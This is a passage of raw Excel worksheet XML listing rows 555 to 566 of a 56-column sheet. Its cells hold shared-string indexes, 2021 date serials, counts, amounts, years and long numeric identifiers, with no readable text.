      <c r="BA555" t="s">
        <v>16973</v>
      </c>
      <c r="BB555" t="s">
        <v>15460</v>
      </c>
      <c r="BC555" t="s">
        <v>13554</v>
      </c>
      <c r="BD555" t="s">
        <v>13555</v>
      </c>
    </row>
    <row r="556" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A556">
        <v>1595</v>
      </c>
      <c r="B556" t="s">
        <v>4456</v>
      </c>
      <c r="C556" t="s">
        <v>318</v>
      </c>
      <c r="D556" t="s">
        <v>4457</v>
      </c>
      <c r="E556" t="s">
        <v>363</v>
      </c>
      <c r="F556" t="s">
        <v>3499</v>
      </c>
      <c r="G556" s="1">
        <v>44274</v>
      </c>
      <c r="H556">
        <v>9522</v>
      </c>
      <c r="I556">
        <v>9522</v>
      </c>
      <c r="J556">
        <v>0</v>
      </c>
      <c r="K556">
        <v>0</v>
      </c>
      <c r="L556">
        <v>0</v>
      </c>
      <c r="M556">
        <v>0</v>
      </c>
      <c r="N556">
        <v>0</v>
      </c>
      <c r="O556">
        <v>0</v>
      </c>
      <c r="P556">
        <v>0</v>
      </c>
      <c r="Q556">
        <v>0</v>
      </c>
      <c r="R556">
        <v>0</v>
      </c>
      <c r="S556">
        <v>0</v>
      </c>
      <c r="T556">
        <v>1</v>
      </c>
      <c r="U556">
        <v>0</v>
      </c>
      <c r="V556">
        <v>0</v>
      </c>
      <c r="W556">
        <v>0</v>
      </c>
      <c r="X556">
        <v>0</v>
      </c>
      <c r="Y556">
        <v>0</v>
      </c>
      <c r="Z556">
        <v>0</v>
      </c>
      <c r="AA556">
        <v>0</v>
      </c>
      <c r="AB556">
        <v>0</v>
      </c>
      <c r="AC556">
        <v>0</v>
      </c>
      <c r="AD556">
        <v>0</v>
      </c>
      <c r="AE556">
        <v>10</v>
      </c>
      <c r="AF556" t="s">
        <v>4458</v>
      </c>
      <c r="AG556">
        <v>90242</v>
      </c>
      <c r="AH556">
        <v>26</v>
      </c>
      <c r="AJ556">
        <v>420</v>
      </c>
      <c r="AK556" t="s">
        <v>331</v>
      </c>
      <c r="AL556" t="s">
        <v>4459</v>
      </c>
      <c r="AM556" t="s">
        <v>4460</v>
      </c>
      <c r="AN556" t="s">
        <v>55</v>
      </c>
      <c r="AO556">
        <v>1997</v>
      </c>
      <c r="AP556" t="s">
        <v>4461</v>
      </c>
      <c r="AQ556" t="s">
        <v>4462</v>
      </c>
      <c r="AR556" t="s">
        <v>4463</v>
      </c>
      <c r="AS556" t="s">
        <v>71</v>
      </c>
      <c r="AT556" t="s">
        <v>58</v>
      </c>
      <c r="AU556">
        <v>6</v>
      </c>
      <c r="AV556">
        <v>1</v>
      </c>
      <c r="AW556">
        <v>0</v>
      </c>
      <c r="AX556">
        <v>40</v>
      </c>
      <c r="AY556">
        <v>4</v>
      </c>
      <c r="AZ556">
        <v>86</v>
      </c>
      <c r="BA556" t="s">
        <v>16945</v>
      </c>
      <c r="BB556" t="s">
        <v>15391</v>
      </c>
      <c r="BC556">
        <v>0</v>
      </c>
      <c r="BD556" t="s">
        <v>13359</v>
      </c>
    </row>
    <row r="557" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A557">
        <v>1453</v>
      </c>
      <c r="B557" t="s">
        <v>4464</v>
      </c>
      <c r="C557" t="s">
        <v>168</v>
      </c>
      <c r="D557" t="s">
        <v>4465</v>
      </c>
      <c r="E557" t="s">
        <v>142</v>
      </c>
      <c r="F557" t="s">
        <v>4466</v>
      </c>
      <c r="G557" s="1">
        <v>44323</v>
      </c>
      <c r="H557">
        <v>9565</v>
      </c>
      <c r="I557">
        <v>9565</v>
      </c>
      <c r="J557">
        <v>1</v>
      </c>
      <c r="K557">
        <v>0</v>
      </c>
      <c r="L557">
        <v>2</v>
      </c>
      <c r="M557">
        <v>0</v>
      </c>
      <c r="N557">
        <v>0</v>
      </c>
      <c r="O557">
        <v>0</v>
      </c>
      <c r="P557">
        <v>0</v>
      </c>
      <c r="Q557">
        <v>1</v>
      </c>
      <c r="R557">
        <v>8</v>
      </c>
      <c r="S557">
        <v>0</v>
      </c>
      <c r="T557">
        <v>1</v>
      </c>
      <c r="U557">
        <v>150000</v>
      </c>
      <c r="V557">
        <v>0</v>
      </c>
      <c r="W557">
        <v>1500</v>
      </c>
      <c r="X557">
        <v>0</v>
      </c>
      <c r="Y557">
        <v>0</v>
      </c>
      <c r="Z557">
        <v>0</v>
      </c>
      <c r="AA557">
        <v>0</v>
      </c>
      <c r="AB557">
        <v>300</v>
      </c>
      <c r="AC557">
        <v>500</v>
      </c>
      <c r="AD557">
        <v>0</v>
      </c>
      <c r="AE557">
        <v>5000</v>
      </c>
      <c r="AF557" t="s">
        <v>4467</v>
      </c>
      <c r="AG557">
        <v>45173</v>
      </c>
      <c r="AH557">
        <v>13</v>
      </c>
      <c r="AJ557">
        <v>169</v>
      </c>
      <c r="AK557" t="s">
        <v>1723</v>
      </c>
      <c r="AL557" t="s">
        <v>4468</v>
      </c>
      <c r="AM557" t="s">
        <v>4469</v>
      </c>
      <c r="AN557" t="s">
        <v>55</v>
      </c>
      <c r="AO557">
        <v>2003</v>
      </c>
      <c r="AP557" t="s">
        <v>4470</v>
      </c>
      <c r="AQ557" t="s">
        <v>4471</v>
      </c>
      <c r="AR557" t="s">
        <v>4467</v>
      </c>
      <c r="AS557" t="s">
        <v>71</v>
      </c>
      <c r="AT557" t="s">
        <v>58</v>
      </c>
      <c r="AU557">
        <v>25</v>
      </c>
      <c r="AV557">
        <v>1</v>
      </c>
      <c r="AW557">
        <v>8</v>
      </c>
      <c r="AX557">
        <v>13</v>
      </c>
      <c r="AY557">
        <v>2</v>
      </c>
      <c r="AZ557">
        <v>2</v>
      </c>
      <c r="BA557" t="s">
        <v>16900</v>
      </c>
      <c r="BB557" t="s">
        <v>15288</v>
      </c>
      <c r="BC557">
        <v>0</v>
      </c>
      <c r="BD557" t="s">
        <v>13267</v>
      </c>
    </row>
    <row r="558" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A558">
        <v>1397</v>
      </c>
      <c r="B558" t="s">
        <v>4472</v>
      </c>
      <c r="C558" t="s">
        <v>458</v>
      </c>
      <c r="D558" t="s">
        <v>4473</v>
      </c>
      <c r="E558" t="s">
        <v>843</v>
      </c>
      <c r="F558" t="s">
        <v>859</v>
      </c>
      <c r="G558" s="1">
        <v>44301</v>
      </c>
      <c r="H558">
        <v>9574</v>
      </c>
      <c r="I558">
        <v>9574</v>
      </c>
      <c r="J558">
        <v>0</v>
      </c>
      <c r="K558">
        <v>1</v>
      </c>
      <c r="L558">
        <v>0</v>
      </c>
      <c r="M558">
        <v>0</v>
      </c>
      <c r="N558">
        <v>0</v>
      </c>
      <c r="O558">
        <v>0</v>
      </c>
      <c r="P558">
        <v>0</v>
      </c>
      <c r="Q558">
        <v>0</v>
      </c>
      <c r="R558">
        <v>0</v>
      </c>
      <c r="S558">
        <v>1</v>
      </c>
      <c r="T558">
        <v>0</v>
      </c>
      <c r="U558">
        <v>0</v>
      </c>
      <c r="V558">
        <v>1500</v>
      </c>
      <c r="W558">
        <v>0</v>
      </c>
      <c r="X558">
        <v>0</v>
      </c>
      <c r="Y558">
        <v>0</v>
      </c>
      <c r="Z558">
        <v>0</v>
      </c>
      <c r="AA558">
        <v>0</v>
      </c>
      <c r="AB558">
        <v>0</v>
      </c>
      <c r="AC558">
        <v>0</v>
      </c>
      <c r="AD558">
        <v>1</v>
      </c>
      <c r="AE558">
        <v>0</v>
      </c>
      <c r="AF558" t="s">
        <v>4472</v>
      </c>
      <c r="AG558">
        <v>29661</v>
      </c>
      <c r="AH558">
        <v>5</v>
      </c>
      <c r="AJ558">
        <v>148</v>
      </c>
      <c r="AK558" t="s">
        <v>4474</v>
      </c>
      <c r="AL558" t="s">
        <v>4475</v>
      </c>
      <c r="AM558" t="s">
        <v>4476</v>
      </c>
      <c r="AN558" t="s">
        <v>68</v>
      </c>
      <c r="AO558">
        <v>2017</v>
      </c>
      <c r="AP558" t="s">
        <v>4477</v>
      </c>
      <c r="AQ558" t="s">
        <v>4478</v>
      </c>
      <c r="AR558" t="s">
        <v>4479</v>
      </c>
      <c r="AS558" t="s">
        <v>57</v>
      </c>
      <c r="AT558" t="s">
        <v>72</v>
      </c>
      <c r="AU558">
        <v>30</v>
      </c>
      <c r="AV558">
        <v>0</v>
      </c>
      <c r="AW558">
        <v>2</v>
      </c>
      <c r="AX558">
        <v>0</v>
      </c>
      <c r="AY558">
        <v>3</v>
      </c>
      <c r="AZ558">
        <v>0</v>
      </c>
      <c r="BA558" t="s">
        <v>16871</v>
      </c>
      <c r="BB558" t="s">
        <v>15248</v>
      </c>
      <c r="BC558" t="s">
        <v>10231</v>
      </c>
      <c r="BD558" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="559" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A559">
        <v>1398</v>
      </c>
      <c r="B559" t="s">
        <v>4480</v>
      </c>
      <c r="C559" t="s">
        <v>458</v>
      </c>
      <c r="D559" t="s">
        <v>4481</v>
      </c>
      <c r="E559" t="s">
        <v>843</v>
      </c>
      <c r="F559" t="s">
        <v>859</v>
      </c>
      <c r="G559" s="1">
        <v>44302</v>
      </c>
      <c r="H559">
        <v>9582</v>
      </c>
      <c r="I559">
        <v>9582</v>
      </c>
      <c r="J559">
        <v>0</v>
      </c>
      <c r="K559">
        <v>1</v>
      </c>
      <c r="L559">
        <v>0</v>
      </c>
      <c r="M559">
        <v>0</v>
      </c>
      <c r="N559">
        <v>0</v>
      </c>
      <c r="O559">
        <v>0</v>
      </c>
      <c r="P559">
        <v>0</v>
      </c>
      <c r="Q559">
        <v>0</v>
      </c>
      <c r="R559">
        <v>0</v>
      </c>
      <c r="S559">
        <v>0</v>
      </c>
      <c r="T559">
        <v>0</v>
      </c>
      <c r="U559">
        <v>0</v>
      </c>
      <c r="V559">
        <v>1500</v>
      </c>
      <c r="W559">
        <v>0</v>
      </c>
      <c r="X559">
        <v>0</v>
      </c>
      <c r="Y559">
        <v>0</v>
      </c>
      <c r="Z559">
        <v>0</v>
      </c>
      <c r="AA559">
        <v>0</v>
      </c>
      <c r="AB559">
        <v>0</v>
      </c>
      <c r="AC559">
        <v>0</v>
      </c>
      <c r="AD559">
        <v>0</v>
      </c>
      <c r="AE559">
        <v>0</v>
      </c>
      <c r="AF559" t="s">
        <v>438</v>
      </c>
      <c r="AG559">
        <v>29661</v>
      </c>
      <c r="AH559">
        <v>5</v>
      </c>
      <c r="AJ559">
        <v>148</v>
      </c>
      <c r="AK559" t="s">
        <v>4474</v>
      </c>
      <c r="AL559" t="s">
        <v>4482</v>
      </c>
      <c r="AM559" t="s">
        <v>4483</v>
      </c>
      <c r="AN559" t="s">
        <v>68</v>
      </c>
      <c r="AO559">
        <v>2017</v>
      </c>
      <c r="AP559">
        <v>82385540806</v>
      </c>
      <c r="AQ559">
        <v>82385540806</v>
      </c>
      <c r="AR559" t="s">
        <v>438</v>
      </c>
      <c r="AS559" t="s">
        <v>71</v>
      </c>
      <c r="AT559" t="s">
        <v>72</v>
      </c>
      <c r="AU559">
        <v>30</v>
      </c>
      <c r="AV559">
        <v>0</v>
      </c>
      <c r="AW559">
        <v>1</v>
      </c>
      <c r="AX559">
        <v>0</v>
      </c>
      <c r="AY559">
        <v>4</v>
      </c>
      <c r="AZ559">
        <v>0</v>
      </c>
      <c r="BA559" t="s">
        <v>16872</v>
      </c>
      <c r="BB559" t="s">
        <v>15249</v>
      </c>
      <c r="BC559" t="s">
        <v>10231</v>
      </c>
      <c r="BD559" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="560" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A560">
        <v>1175</v>
      </c>
      <c r="B560" t="s">
        <v>4484</v>
      </c>
      <c r="C560" t="s">
        <v>458</v>
      </c>
      <c r="D560" t="s">
        <v>4485</v>
      </c>
      <c r="E560" t="s">
        <v>843</v>
      </c>
      <c r="F560" t="s">
        <v>1368</v>
      </c>
      <c r="G560" s="1">
        <v>44301</v>
      </c>
      <c r="H560">
        <v>9628</v>
      </c>
      <c r="I560">
        <v>9628</v>
      </c>
      <c r="J560">
        <v>0</v>
      </c>
      <c r="K560">
        <v>0</v>
      </c>
      <c r="L560">
        <v>0</v>
      </c>
      <c r="M560">
        <v>0</v>
      </c>
      <c r="N560">
        <v>0</v>
      </c>
      <c r="O560">
        <v>0</v>
      </c>
      <c r="P560">
        <v>0</v>
      </c>
      <c r="Q560">
        <v>1</v>
      </c>
      <c r="R560">
        <v>10</v>
      </c>
      <c r="S560">
        <v>0</v>
      </c>
      <c r="T560">
        <v>1</v>
      </c>
      <c r="U560">
        <v>0</v>
      </c>
      <c r="V560">
        <v>0</v>
      </c>
      <c r="W560">
        <v>0</v>
      </c>
      <c r="X560">
        <v>0</v>
      </c>
      <c r="Y560">
        <v>0</v>
      </c>
      <c r="Z560">
        <v>0</v>
      </c>
      <c r="AA560">
        <v>0</v>
      </c>
      <c r="AB560">
        <v>500</v>
      </c>
      <c r="AC560">
        <v>1000</v>
      </c>
      <c r="AD560">
        <v>0</v>
      </c>
      <c r="AE560">
        <v>1000</v>
      </c>
      <c r="AF560" t="s">
        <v>4484</v>
      </c>
      <c r="AG560">
        <v>29111</v>
      </c>
      <c r="AH560">
        <v>5</v>
      </c>
      <c r="AJ560">
        <v>154</v>
      </c>
      <c r="AK560" t="s">
        <v>4486</v>
      </c>
      <c r="AL560" t="s">
        <v>4486</v>
      </c>
      <c r="AM560" t="s">
        <v>4487</v>
      </c>
      <c r="AN560" t="s">
        <v>68</v>
      </c>
      <c r="AO560">
        <v>2010</v>
      </c>
      <c r="AP560">
        <v>8127064025</v>
      </c>
      <c r="AQ560" t="s">
        <v>4488</v>
      </c>
      <c r="AR560" t="s">
        <v>4484</v>
      </c>
      <c r="AS560" t="s">
        <v>71</v>
      </c>
      <c r="AT560" t="s">
        <v>72</v>
      </c>
      <c r="AU560">
        <v>6</v>
      </c>
      <c r="AV560">
        <v>0</v>
      </c>
      <c r="AW560">
        <v>0</v>
      </c>
      <c r="AX560">
        <v>0</v>
      </c>
      <c r="AY560">
        <v>3</v>
      </c>
      <c r="AZ560">
        <v>0</v>
      </c>
      <c r="BA560" t="s">
        <v>17694</v>
      </c>
      <c r="BB560" t="s">
        <v>15099</v>
      </c>
      <c r="BC560" t="s">
        <v>9638</v>
      </c>
      <c r="BD560" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="561" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A561">
        <v>1690</v>
      </c>
      <c r="B561" t="s">
        <v>4489</v>
      </c>
      <c r="C561" t="s">
        <v>458</v>
      </c>
      <c r="D561" t="s">
        <v>4490</v>
      </c>
      <c r="E561" t="s">
        <v>843</v>
      </c>
      <c r="F561" t="s">
        <v>1368</v>
      </c>
      <c r="G561" s="1">
        <v>44302</v>
      </c>
      <c r="H561">
        <v>9631</v>
      </c>
      <c r="I561">
        <v>9631</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t="s">
        <v>4491</v>
      </c>
      <c r="AG561">
        <v>29664</v>
      </c>
      <c r="AH561">
        <v>5</v>
      </c>
      <c r="AJ561">
        <v>148</v>
      </c>
      <c r="AK561" t="s">
        <v>4492</v>
      </c>
      <c r="AL561" t="s">
        <v>4493</v>
      </c>
      <c r="AM561" t="s">
        <v>4494</v>
      </c>
      <c r="AN561" t="s">
        <v>55</v>
      </c>
      <c r="AO561">
        <v>2019</v>
      </c>
      <c r="AP561">
        <v>81372024132</v>
      </c>
      <c r="AQ561" t="s">
        <v>4495</v>
      </c>
      <c r="AR561" t="s">
        <v>3728</v>
      </c>
      <c r="AS561" t="s">
        <v>71</v>
      </c>
      <c r="AT561" t="s">
        <v>58</v>
      </c>
      <c r="AU561">
        <v>13</v>
      </c>
      <c r="AV561">
        <v>1</v>
      </c>
      <c r="AW561">
        <v>0</v>
      </c>
      <c r="AX561">
        <v>0</v>
      </c>
      <c r="AY561">
        <v>6</v>
      </c>
      <c r="AZ561">
        <v>5</v>
      </c>
      <c r="BA561" t="s">
        <v>16971</v>
      </c>
      <c r="BB561" t="s">
        <v>15454</v>
      </c>
      <c r="BC561" t="s">
        <v>10231</v>
      </c>
      <c r="BD561" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="562" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A562">
        <v>1589</v>
      </c>
      <c r="B562" t="s">
        <v>4496</v>
      </c>
      <c r="C562" t="s">
        <v>99</v>
      </c>
      <c r="D562" t="s">
        <v>4497</v>
      </c>
      <c r="E562" t="s">
        <v>4498</v>
      </c>
      <c r="F562" t="s">
        <v>4499</v>
      </c>
      <c r="G562" s="1">
        <v>44358</v>
      </c>
      <c r="H562">
        <v>9649</v>
      </c>
      <c r="I562">
        <v>9649</v>
      </c>
      <c r="J562">
        <v>0</v>
      </c>
      <c r="K562">
        <v>0</v>
      </c>
      <c r="L562">
        <v>0</v>
      </c>
      <c r="M562">
        <v>0</v>
      </c>
      <c r="N562">
        <v>0</v>
      </c>
      <c r="O562">
        <v>0</v>
      </c>
      <c r="P562">
        <v>0</v>
      </c>
      <c r="Q562">
        <v>0</v>
      </c>
      <c r="R562">
        <v>0</v>
      </c>
      <c r="S562">
        <v>0</v>
      </c>
      <c r="T562">
        <v>1</v>
      </c>
      <c r="U562">
        <v>0</v>
      </c>
      <c r="V562">
        <v>0</v>
      </c>
      <c r="W562">
        <v>0</v>
      </c>
      <c r="X562">
        <v>0</v>
      </c>
      <c r="Y562">
        <v>0</v>
      </c>
      <c r="Z562">
        <v>0</v>
      </c>
      <c r="AA562">
        <v>0</v>
      </c>
      <c r="AB562">
        <v>0</v>
      </c>
      <c r="AC562">
        <v>0</v>
      </c>
      <c r="AD562">
        <v>0</v>
      </c>
      <c r="AE562">
        <v>10000</v>
      </c>
      <c r="AF562" t="s">
        <v>4500</v>
      </c>
      <c r="AG562">
        <v>14140</v>
      </c>
      <c r="AH562">
        <v>12</v>
      </c>
      <c r="AJ562">
        <v>160</v>
      </c>
      <c r="AK562" t="s">
        <v>4501</v>
      </c>
      <c r="AL562" t="s">
        <v>4502</v>
      </c>
      <c r="AM562" t="s">
        <v>4503</v>
      </c>
      <c r="AN562" t="s">
        <v>55</v>
      </c>
      <c r="AO562">
        <v>1995</v>
      </c>
      <c r="AP562">
        <v>216451037</v>
      </c>
      <c r="AQ562" t="s">
        <v>4504</v>
      </c>
      <c r="AR562" t="s">
        <v>4505</v>
      </c>
      <c r="AS562" t="s">
        <v>553</v>
      </c>
      <c r="AT562" t="s">
        <v>58</v>
      </c>
      <c r="AU562">
        <v>21</v>
      </c>
      <c r="AV562">
        <v>1</v>
      </c>
      <c r="AW562">
        <v>0</v>
      </c>
      <c r="AX562">
        <v>0</v>
      </c>
      <c r="AY562">
        <v>8</v>
      </c>
      <c r="AZ562">
        <v>5</v>
      </c>
      <c r="BA562" t="s">
        <v>16943</v>
      </c>
      <c r="BB562" t="s">
        <v>15386</v>
      </c>
      <c r="BC562" t="s">
        <v>13435</v>
      </c>
      <c r="BD562">
        <v>0</v>
      </c>
    </row>
    <row r="563" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A563">
        <v>1348</v>
      </c>
      <c r="B563" t="s">
        <v>4506</v>
      </c>
      <c r="C563" t="s">
        <v>47</v>
      </c>
      <c r="D563" t="s">
        <v>4507</v>
      </c>
      <c r="E563" t="s">
        <v>142</v>
      </c>
      <c r="F563" t="s">
        <v>4508</v>
      </c>
      <c r="G563" s="1">
        <v>44305</v>
      </c>
      <c r="H563">
        <v>9672</v>
      </c>
      <c r="I563">
        <v>9672</v>
      </c>
      <c r="J563">
        <v>1</v>
      </c>
      <c r="K563">
        <v>0</v>
      </c>
      <c r="L563">
        <v>2</v>
      </c>
      <c r="M563">
        <v>4</v>
      </c>
      <c r="N563">
        <v>0</v>
      </c>
      <c r="O563">
        <v>0</v>
      </c>
      <c r="P563">
        <v>0</v>
      </c>
      <c r="Q563">
        <v>0</v>
      </c>
      <c r="R563">
        <v>0</v>
      </c>
      <c r="S563">
        <v>0</v>
      </c>
      <c r="T563">
        <v>1</v>
      </c>
      <c r="U563">
        <v>2000000</v>
      </c>
      <c r="V563">
        <v>0</v>
      </c>
      <c r="W563">
        <v>5000</v>
      </c>
      <c r="X563">
        <v>1500</v>
      </c>
      <c r="Y563">
        <v>0</v>
      </c>
      <c r="Z563">
        <v>0</v>
      </c>
      <c r="AA563">
        <v>0</v>
      </c>
      <c r="AB563">
        <v>0</v>
      </c>
      <c r="AC563">
        <v>0</v>
      </c>
      <c r="AD563">
        <v>0</v>
      </c>
      <c r="AE563">
        <v>0</v>
      </c>
      <c r="AF563" t="s">
        <v>4509</v>
      </c>
      <c r="AG563">
        <v>22616</v>
      </c>
      <c r="AH563">
        <v>2</v>
      </c>
      <c r="AJ563">
        <v>27</v>
      </c>
      <c r="AK563" t="s">
        <v>2607</v>
      </c>
      <c r="AL563" t="s">
        <v>2608</v>
      </c>
      <c r="AM563" t="s">
        <v>4510</v>
      </c>
      <c r="AN563" t="s">
        <v>55</v>
      </c>
      <c r="AO563">
        <v>2003</v>
      </c>
      <c r="AP563" t="s">
        <v>4511</v>
      </c>
      <c r="AQ563" t="s">
        <v>4512</v>
      </c>
      <c r="AR563" t="s">
        <v>4509</v>
      </c>
      <c r="AS563" t="s">
        <v>71</v>
      </c>
      <c r="AT563" t="s">
        <v>58</v>
      </c>
      <c r="AU563">
        <v>26</v>
      </c>
      <c r="AV563">
        <v>1</v>
      </c>
      <c r="AW563">
        <v>45</v>
      </c>
      <c r="AX563">
        <v>170</v>
      </c>
      <c r="AY563">
        <v>20</v>
      </c>
      <c r="AZ563">
        <v>60</v>
      </c>
      <c r="BA563" t="s">
        <v>16852</v>
      </c>
      <c r="BB563" t="s">
        <v>15217</v>
      </c>
      <c r="BC563">
        <v>0</v>
      </c>
      <c r="BD563" t="s">
        <v>13404</v>
      </c>
    </row>
    <row r="564" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A564">
        <v>1517</v>
      </c>
      <c r="B564" t="s">
        <v>4513</v>
      </c>
      <c r="C564" t="s">
        <v>157</v>
      </c>
      <c r="D564" t="s">
        <v>4514</v>
      </c>
      <c r="E564" t="s">
        <v>363</v>
      </c>
      <c r="F564" t="s">
        <v>364</v>
      </c>
      <c r="G564" s="1">
        <v>44287</v>
      </c>
      <c r="H564">
        <v>9701</v>
      </c>
      <c r="I564">
        <v>9701</v>
      </c>
      <c r="J564">
        <v>0</v>
      </c>
      <c r="K564">
        <v>0</v>
      </c>
      <c r="L564">
        <v>0</v>
      </c>
      <c r="M564">
        <v>0</v>
      </c>
      <c r="N564">
        <v>0</v>
      </c>
      <c r="O564">
        <v>0</v>
      </c>
      <c r="P564">
        <v>0</v>
      </c>
      <c r="Q564">
        <v>0</v>
      </c>
      <c r="R564">
        <v>0</v>
      </c>
      <c r="S564">
        <v>0</v>
      </c>
      <c r="T564">
        <v>2</v>
      </c>
      <c r="U564">
        <v>0</v>
      </c>
      <c r="V564">
        <v>0</v>
      </c>
      <c r="W564">
        <v>0</v>
      </c>
      <c r="X564">
        <v>0</v>
      </c>
      <c r="Y564">
        <v>0</v>
      </c>
      <c r="Z564">
        <v>0</v>
      </c>
      <c r="AA564">
        <v>0</v>
      </c>
      <c r="AB564">
        <v>0</v>
      </c>
      <c r="AC564">
        <v>0</v>
      </c>
      <c r="AD564">
        <v>0</v>
      </c>
      <c r="AE564">
        <v>80000</v>
      </c>
      <c r="AF564" t="s">
        <v>4515</v>
      </c>
      <c r="AG564">
        <v>60181</v>
      </c>
      <c r="AH564">
        <v>16</v>
      </c>
      <c r="AJ564">
        <v>264</v>
      </c>
      <c r="AK564" t="s">
        <v>4516</v>
      </c>
      <c r="AL564" t="s">
        <v>4516</v>
      </c>
      <c r="AM564" t="s">
        <v>4517</v>
      </c>
      <c r="AN564" t="s">
        <v>55</v>
      </c>
      <c r="AO564">
        <v>2019</v>
      </c>
      <c r="AP564">
        <v>8123353472</v>
      </c>
      <c r="AQ564" t="s">
        <v>4518</v>
      </c>
      <c r="AR564" t="s">
        <v>4515</v>
      </c>
      <c r="AS564" t="s">
        <v>371</v>
      </c>
      <c r="AT564" t="s">
        <v>58</v>
      </c>
      <c r="AU564">
        <v>0</v>
      </c>
      <c r="AV564">
        <v>0</v>
      </c>
      <c r="AW564">
        <v>15</v>
      </c>
      <c r="AX564">
        <v>8</v>
      </c>
      <c r="AY564">
        <v>1</v>
      </c>
      <c r="AZ564">
        <v>1</v>
      </c>
      <c r="BA564" t="s">
        <v>16922</v>
      </c>
      <c r="BB564" t="s">
        <v>15334</v>
      </c>
      <c r="BC564">
        <v>0</v>
      </c>
      <c r="BD564" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="565" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A565">
        <v>1054</v>
      </c>
      <c r="B565" t="s">
        <v>4519</v>
      </c>
      <c r="C565" t="s">
        <v>157</v>
      </c>
      <c r="D565" t="s">
        <v>4520</v>
      </c>
      <c r="E565" t="s">
        <v>142</v>
      </c>
      <c r="F565" t="s">
        <v>4521</v>
      </c>
      <c r="G565" s="1">
        <v>44274</v>
      </c>
      <c r="H565">
        <v>9756</v>
      </c>
      <c r="I565">
        <v>9756</v>
      </c>
      <c r="J565">
        <v>2</v>
      </c>
      <c r="K565">
        <v>1</v>
      </c>
      <c r="L565">
        <v>0</v>
      </c>
      <c r="M565">
        <v>0</v>
      </c>
      <c r="N565">
        <v>0</v>
      </c>
      <c r="O565">
        <v>0</v>
      </c>
      <c r="P565">
        <v>0</v>
      </c>
      <c r="Q565">
        <v>1</v>
      </c>
      <c r="R565">
        <v>0</v>
      </c>
      <c r="S565">
        <v>0</v>
      </c>
      <c r="T565">
        <v>1</v>
      </c>
      <c r="U565">
        <v>5000</v>
      </c>
      <c r="V565">
        <v>2000</v>
      </c>
      <c r="W565">
        <v>0</v>
      </c>
      <c r="X565">
        <v>0</v>
      </c>
      <c r="Y565">
        <v>0</v>
      </c>
      <c r="Z565">
        <v>0</v>
      </c>
      <c r="AA565">
        <v>0</v>
      </c>
      <c r="AB565">
        <v>500</v>
      </c>
      <c r="AC565">
        <v>0</v>
      </c>
      <c r="AD565">
        <v>0</v>
      </c>
      <c r="AE565">
        <v>500</v>
      </c>
      <c r="AF565" t="s">
        <v>4522</v>
      </c>
      <c r="AG565">
        <v>61252</v>
      </c>
      <c r="AH565">
        <v>16</v>
      </c>
      <c r="AJ565">
        <v>242</v>
      </c>
      <c r="AK565" t="s">
        <v>1894</v>
      </c>
      <c r="AL565" t="s">
        <v>4337</v>
      </c>
      <c r="AM565" t="s">
        <v>4523</v>
      </c>
      <c r="AN565" t="s">
        <v>55</v>
      </c>
      <c r="AO565">
        <v>2010</v>
      </c>
      <c r="AP565">
        <v>811309648</v>
      </c>
      <c r="AQ565" t="s">
        <v>4524</v>
      </c>
      <c r="AR565" t="s">
        <v>4522</v>
      </c>
      <c r="AS565" t="s">
        <v>71</v>
      </c>
      <c r="AT565" t="s">
        <v>58</v>
      </c>
      <c r="AU565">
        <v>25</v>
      </c>
      <c r="AV565">
        <v>1</v>
      </c>
      <c r="AW565">
        <v>2</v>
      </c>
      <c r="AX565">
        <v>2</v>
      </c>
      <c r="AY565">
        <v>7</v>
      </c>
      <c r="AZ565">
        <v>1</v>
      </c>
      <c r="BA565" t="s">
        <v>16796</v>
      </c>
      <c r="BB565" t="s">
        <v>15022</v>
      </c>
      <c r="BC565" t="s">
        <v>13418</v>
      </c>
      <c r="BD565">
        <v>0</v>
      </c>
    </row>
    <row r="566" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A566">
        <v>1361</v>
      </c>
      <c r="B566" t="s">
        <v>4525</v>
      </c>
      <c r="C566" t="s">
        <v>157</v>
      </c>
      <c r="D566" t="s">
        <v>4526</v>
      </c>
      <c r="E566" t="s">
        <v>142</v>
      </c>
      <c r="F566" t="s">
        <v>673</v>
      </c>
      <c r="G566" s="1">
        <v>44319</v>
      </c>
      <c r="H566">
        <v>9839</v>
      </c>
      <c r="I566">
        <v>9839</v>
      </c>
      <c r="J566">
        <v>1</v>
      </c>
      <c r="K566">
        <v>0</v>
      </c>
      <c r="L566">
        <v>0</v>
      </c>
      <c r="M566">
        <v>1</v>
      </c>
      <c r="N566">
        <v>0</v>
      </c>
      <c r="O566">
        <v>0</v>
      </c>
      <c r="P566">
        <v>0</v>
      </c>
      <c r="Q566">
        <v>100</v>
      </c>
      <c r="R566">
        <v>50</v>
      </c>
      <c r="S566">
        <v>0</v>
      </c>
      <c r="T566">
        <v>1</v>
      </c>
      <c r="U566">
        <v>2000</v>
      </c>
      <c r="V566">
        <v>0</v>
      </c>
      <c r="W566">
        <v>0</v>
      </c>
      <c r="X566">
        <v>1000</v>
      </c>
      <c r="Y566">
        <v>0</v>
      </c>
      <c r="Z566">
        <v>0</v>
      </c>
      <c r="AA566">
        <v>0</v>
      </c>
      <c r="AB566">
        <v>100</v>
      </c>
      <c r="AC566">
        <v>50</v>
      </c>
      <c r="AD566">
        <v>0</v>
      </c>
      <c r="AE566">
        <v>0</v>
      </c>
      <c r="AF566" t="s">
        <v>4527</v>
      </c>
      <c r="AG566">
        <v>61256</v>
      </c>
      <c r="AH566">
        <v>16</v>
      </c>
      <c r="AJ566">
        <v>242</v>
      </c>
      <c r="AK566" t="s">
        <v>758</v>
      </c>
      <c r="AL566" t="s">
        <v>1323</v>
      </c>
      <c r="AM566" t="s">
        <v>4528</v>
      </c>
      <c r="AN566" t="s">
        <v>55</v>
      </c>
      <c r="AO566">
        <v>2017</v>
      </c>
      <c r="AP566" t="s">
        <v>4529</v>
      </c>
      <c r="AQ566">
        <v>81330954422</v>
      </c>
